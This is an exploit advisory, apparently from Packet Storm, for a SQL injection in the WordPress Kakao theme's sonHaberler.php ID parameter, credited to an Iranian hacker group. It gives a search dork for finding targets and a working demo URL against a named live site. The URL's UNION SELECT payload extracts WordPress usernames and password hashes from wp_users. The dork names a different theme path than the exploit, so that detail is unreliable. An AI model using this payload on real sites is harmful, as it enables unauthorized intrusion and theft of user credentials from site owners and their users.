The WordPress Kakao theme suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
3dc2268c974652d6a7dc818180fe747ab9e25822e57cf9844178f7d63c47f4b5# Exploit Title : Wordpress theme kakao Sql Injection
#
# Author : Iranian DataCoders Security Team
#
# Discovered By : sil3nt
#
# Home : www.datacoders.org/
#
# Security Risk : High - SQL Injection
#
# Dork : inurl:themes/wilderness/gallery.php
#
##############################################
#
# Expl0iTs :
#
# [Target]/wp-content/themes/kakao/sonHaberler.php?ID=[sql]
#
# D3m0 :
#
# http://www.kakaobulutlari.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
#
##############################################
#
# Greats :H-SK33PY - Immortal Boy - Neda - Noter - Monster§Face - Siamak.Black -agrab - ARTA - M0ri - Reza-S4T4N - Dj.TiniVini - Angel--D3m0n
#
##############################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed